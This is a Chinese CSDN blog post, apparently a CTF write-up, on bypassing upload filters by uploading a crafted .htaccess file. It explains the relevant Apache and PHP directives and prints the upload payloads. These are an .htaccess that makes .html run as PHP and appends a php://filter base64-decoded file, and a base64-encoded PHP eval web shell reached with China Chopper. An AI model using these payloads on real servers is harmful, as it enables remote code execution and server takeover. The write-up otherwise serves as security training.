文件上传漏洞之.htaccess文件解析漏洞

最新推荐文章于 2024-08-19 07:00:00 发布
最新推荐文章于 2024-08-19 07:00:00 发布
阅读量6.7k 收藏 30
点赞数 6
文章标签: apache php 服务器 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sorryagain/article/details/125080205
版权
本文介绍了.htaccess文件的用途和功能,特别是其在Apache服务器上的配置作用,如文件类型映射、错误页面定制等。重点讲解了利用.htaccess文件上传漏洞,通过auto_append_file和php伪协议进行绕过的方法,展示了如何在上传后使得HTML文件被当作PHP解析并执行附加代码。此外,还提到了利用此漏洞的实战步骤和环境,以及相关参考链接。
摘要由CSDN通过智能技术生成

文件上传漏洞之.htaccess文件解析漏洞

文章目录

前置知识

.htaccess文件(或者"分布式配置文件"),全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。

  htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。
  Unix、Linux系统或者是任何版本的Apache Web服务器都是支持.htaccess的,但是有的主机服务商可能不允许你自定义自己的.htaccess文件。
  总之,.htaccess可以帮我们实现包括:文件夹密码保护、用户自动重定向、自定义错误页面、改变你的文件扩展名、封禁特定IP地址的用户、只允许特定IP地址的用户、禁止目录列表,以及使用其他文件作为index文件等一些功能。

  需要注意,.htaccess文件的作用域为其所在目录与其所有的子目录,若是子目录也存在.htaccess文件,则会覆盖父目录的.htaccess效果。

漏洞利用

环境来源: Dest0g3 520迎新赛 WEB funny_upload

打开链接,是一个文件上传的功能。

在这里插入图片描述

尝试上传.php文件,以及进行后缀名绕过均无效,发现服务器进行了过滤。

在这里插入图片描述

这里尝试上传.htaccess文件,但是服务器对文件内容也有校验,过滤了php的标签<?
因此这里使用auto_append_file和php伪协议组合进行绕过。

首先上传.htaccess文件

Content-Disposition: form-data; name="file"; filename=".htaccess"
Content-Type: image/jpeg

AddType application/x-httpd-php .html
php_value auto_append_file "php://filter/convert.base64-decode/resource=a.html"

下面介绍一下上传的文件内容。

(1).htaccess参数

常见配法有以下几种:

AddHandler php5-script .jpg

AddType application/x-httpd-php .jpg

Sethandler application/x-httpd-php

Sethandler 将该目录及子目录的所有文件均映射为php文件类型。
Addhandler 使用 php5-script 处理器来解析所匹配到的文件。
AddType 将特定扩展名文件映射为php文件类型。

(2)auto_append_file参数

使用auto_prepend_file与auto_append_file在所有页面的顶部与底部require文件。

php.ini中有两项:
auto_prepend_file 在页面顶部加载文件
auto_append_file 在页面底部加载文件

使用这种方法可以不需要改动任何页面,当需要修改顶部或底部require文件时,只需要修改auto_prepend_file与auto_append_file的值即可。

在需要顶部或底部加载文件的文件夹中加入.htaccess文件,内容如下:

php_value auto_prepend_file "/home/fdipzone/header.php"
php_value auto_append_file "/home/fdipzone/footer.php"

这样在指定.htaccess的文件夹内的页面文件才会加载 /home/fdipzone/header.php/home/fdipzone/footer.php,其他页面文件不受影响。

使用.htaccess设置,比较灵活,不需要重启服务器,也不需要管理员权限,唯一缺点是目录中每个被读取和被解释的文件每次都要进行处理,而不是在启动时处理一次,所以性能会有所降低。

回到本题,上传:

在这里插入图片描述

上传成功,那其实就是说咱们实现了两个事情:
(在uploads/c47b21fcf8f0bc8b3920541abd8024fd/目录下)
1、html文件都会被当作php文件解析。
2、php文件的底部都会被加上a.html文件的内容Base64解码后的东西。

因此下一步需要再上传一个a.html文件。

Content-Disposition: form-data; name="file"; filename="a.html"
Content-Type: image/jpeg

PD9waHAgQGV2YWwoJF9QT1NUWydwYXNzJ10pOz8+

在这里插入图片描述

访问页面,成功上传。

在这里插入图片描述

菜刀直接连即可。

在这里插入图片描述

参考链接

htaccess_百度百科

Dest0g3 520迎新赛 writeup (misc部分 + web部分)_shu天的博客-CSDN博客

.htaccess文件上传解析漏洞_mmzkyl的博客-CSDN博客_htaccess文件上传解析漏洞

PHP中auto_prepend_file与auto_append_file用法实例分析_php技巧_脚本之家

2ha0yuk7on.
关注
.htaccess上传漏洞解析漏洞
m0_51607644的博客
08-17 4001
写在前边 漏洞学习三步走: 1.了解漏洞原理 2.知道漏洞形成条件,复现漏洞 3.解决如何防范 .htaccess上传漏洞 .htaccess文件作用 概述来说,htaccess文件Apache服务器中的一个配置文件,它负责相关目 录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自 定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、 禁止目录列表、配置默认文档等功能。 Unix、Linux系统或者是任何版本的Apach
文件上传漏洞——.htaccess和.user.ini配置文件的应用
ximo的博客
02-15 1499
一 . htaccess配置文件 htaccess文件Apache服务器中的一个配置文件,只对该文件所在的目录下的文件起作用。 在htaccess配置文件下有这样一条配置: AddType application/x-httpd-php .php .jpg 这条配置的意思是,php和jpg格式的文件,都会被当做php文件解析;我们可以在追加其他的后缀名,都将其解析php文件;但是这样未免有些繁琐。 所以还有另外一条配置: SetHandler application/x-httpd-php 这条
.htaccess文件上传解析漏洞
mmzkyl的博客
01-04 7470
测试环境 upload-labs靶场(Pass-04)     原理 .htaccess文件Apache服务器下的一个配置文件
文件上传漏洞总结
最新发布
csjjjd的博客
08-19 1015
最后再解释一下为什么是先进行的服务器接收而不是网站程序判断:其实问题的答案很简单,确实你的文件一开始都会被服务器接收,但是会被放在一个temp的目录里面,先上传上去到temp目录,后台监测,有问题直接移出,后台监测看还可以配合安全软件进行监测,哪怕上传到了木马在temp目录,但是temp这是低权限目录,程序一般不会执行,而且此时你也很难迅速知道文件的具体路径。而且哪怕最先进行前端的检测,也不会足够安全,前端的代码也是可以f12之类的逆向修改。
文件上传绕过】——解析漏洞_.htaccess文件解析漏洞
weixin_45588247的博客
07-28 3290
文章目录一、实验目的:二、工具:三、实验环境:四、漏洞利用前提:五、原理:六、利用方式:七、`.htaccess文件`内容:八、`.htaccess文件`制作:1. 直接创建文件:2. 通过`cmd命令行`创建:九、实验过程: 一、实验目的: 1、了解什么是.htaccess文件。 2、通过upload-labs闯关游戏(Pass-04),掌握.htaccess文件解析漏洞技术。 二、工具: cmd命令行 火狐/谷歌浏览器 三、实验环境: 靶 机: windows10虚拟机:192.168.100
文件上传漏洞.htaccess
不好好做安全的运维足球狗
03-12 5661
0x00 前言 .htaccess文件(“分布式配置文件”)提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令将受到限制。管理员可以通过Apache的AllowOverride指令来设置。 概述来说,htaccess文件Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htacce...
文件上传漏洞08】.htaccess攻击实验(基于upload-labs-4靶场)
Fighting_hawk的博客
03-02 4335
1. 当存在文件上传漏洞时,只要恶意代码没有被过滤,就存在被执行的危险。 2. 掌握修改.htaccess以改变各种文件执行程序的方法。
58.网络安全渗透测试—[文件上传篇8] —[. htaccess重写解析漏洞-突破上传]
qwsn
08-08 2039
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、. htaccess重写解析漏洞 1、重写解析漏洞的原理: 2、重写解析漏洞的利用:
文件上传漏洞笔记
weixin_42695055的博客
01-09 819
由于程序员在对用户文件上传功能实现代码没有严格限制用户上传的文件后缀以及文件类型或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件
任意文件上传-(一).htaccess文件
05-10
用于利用某些Web服务器(尤其是Apache)的配置漏洞,以实现更高级的文件上传攻击或执行其他恶意操作。 文件类型解析:通过.htaccess修改服务器配置,可以让服务器将特定类型的文件当作PHP或其他可执行脚本处理。例如...
iwebsec靶场文件上传漏洞-.htaccess文件上传
qq_56041380的博客
03-28 1329
.htaccess文件上传是利用.htaccess文件Web服务器进行配置的功能,实现将扩展名为.jpg、.png等的文件当做PHP文件解析的过程
警惕htaccess文件上传解析漏洞
whatiwhere的博客
11-24 9471
实验环境 操作机: Windows XP 目标机:Windows 2003 目标网址:www.test.com 实验目的 了解htaccess文件解析的利用方法 掌握如何去修复此漏洞 实验工具 中国菜刀:是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理,本次试验主要用到其动态脚本管理功能 实验内容 实验步骤 步骤1:...
漏洞复现篇——.htaccess文件解析漏洞
爱国小白帽
02-17 8625
实验环境: PHPstudy php5.6以下不带nts的版本 upload-labs-master上传漏洞靶场 服务器没有禁止.htaccess文件的上传,且服务商允许用户使用自定义.htaccess文件 原理:.htaccess文件(或者"分布式配置文件"),全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或...
1-Web安全——文件上传漏洞
网络安全
08-20 4271
1. 上传文件漏洞原理 现在大部分web应用程序都有上传文件的功能,例如个人博客上传各种文件和图片,招聘网站上传doc文件格式的简历等等。只要web应用程序有上传文件的功能,就可能会存在上传文件漏洞。 为什么会有上传文件漏洞? 一般用户在上传文件时,如果web应用程序的代码没有对上传的文件进行严格的校验和过滤时,容易出现允许上传任意文件的情况,然后恶意攻击者利用这一点上传恶意脚本文件(aspx,php,jsp等文件)到服务器,从而获取网站的管理员权限,对服务器造成巨大威胁,这个恶意文件则被称为webs
文件上传漏洞(全网最详细)
热门推荐
qq_61553520的博客
04-19 1万+
自从学完文件上传后,寻思总结一下,但一直懒惰向后推迟,最近要准备面试了,就趁此机会写一下。文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。“文件上传” 本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。这种攻击方式是最为直接和有效的,所以我们需要思考的是如何绕过检测和过滤。
文件上传漏洞.htaccess文件
weixin_65279640的博客
04-17 845
提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有。简言之,.htaccess就是Apache服务器上的一个可以实现特殊功能的配置文件。http.conf文件中设置了 AllowOverried All ,才能使用.htaccess文件。通过htaccess文件,可以帮我们实现:网页。想要利用好.htaccess文件,我们就需要先了解一下什么是htaccess。,可以把特定文件转化成php执行的特性来进行文件上传漏洞利用。
文件上传 .htaccess
qq_69100706的博客
08-05 480
在CTF(Capture The Flag)竞赛中,利用.htaccess文件进行攻击是一种针对Web服务器配置的技巧,尤其是在Apache Web服务器环境下。.htaccess文件允许目录级别的配置,可以用来修改URL重写规则、设置自定义错误页面、限制IP访问、以及最重要的是,可以用来改变文件的处理方式,这在文件上传漏洞中尤其有用。
Node.js中模块加载机制
Tiger's blog
09-27 211
Node.js中模块查找规则: 【注】以下查找规则均来自于在VS Code中的实践,对于文件以及相应文件的截图太多,比较麻烦,就以文字形式呈现出来。 1.当模块拥有路径但没有后缀时 require('./home.js') require('./home') (1)当路径完整时,直接引入模块文件,读取。 (2)当路径不完整时,首先查找同名文件,如果查找到同名文件,则会查找当前文件夹下的package.json文件中的main选项中的入口文件,但入口文件要求在当前文件夹下; 如果找不到入口文件,则会查找当
Web安全文件上传漏洞测试(防止 黑客利用此漏洞.)
网络安全领域___专研者.
05-21 2731
现在大多的网站和Web应用系统都会有上传功能(比如:文档,图片,头像,视频上传等.),而程序员在开发文件上传功能时,没有对代码做严格校验上传文件的后缀和文件类型. 此时攻击者就可以上传一个与网站脚本语言相对应的恶意代码动态脚本,例如(php,jsp、aspx,asp文件后缀)到服务器上,并将恶意文件传递给网站脚本语言去执行,然后就可以在服务器上执行恶意代码,进行数据库执行、服务器文件管理,服务器命令执行等恶意操作.
htaccess 文件泄漏漏洞
07-28
htaccess 文件泄漏漏洞是一种安全漏洞,可以导致服务器上的敏感信息泄露。.htaccess 文件Apache Web 服务器中用于配置目录级别设置的文件。它可以用于定义访问控制规则、重定向规则等。 当.htaccess 文件的权限配置不正确或者文件中包含敏感信息时,攻击者可以通过访问.htaccess 文件来获取服务器上的敏感信息,如数据库凭据、API 密钥等。这些信息可能会被攻击者用于未授权访问或其他恶意行为。 为了防止.htaccess 文件泄漏漏洞,你可以采取以下措施: 1. 设置正确的文件权限:确保.htaccess 文件的权限设置为适当的值,通常是 644。 2. 限制访问.htaccess 文件:可以通过服务器配置或其他方式限制对.htaccess 文件的直接访问,以防止攻击者通过URL直接访问该文件。 3. 删除敏感信息:避免在.htaccess 文件中存储敏感信息,如数据库凭据、API 密钥等。如果有必要使用这些信息,应该将它们存储在安全的配置文件中,并确保适当地保护该文件。 4. 定期检查和更新文件:定期检查服务器上的.htaccess 文件,确保其内容没有被修改或替换为恶意代码。同时,及时更新服务器和相关软件以修复已知的安全漏洞。 5. 隐藏服务器信息:通过配置服务器,禁止显示服务器信息,以减少攻击者对服务器的了解。 总之,保护.htaccess 文件安全对于维护服务器安全性至关重要。请注意采取适当的安全措施来防止.htaccess 文件泄漏漏洞的发生。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值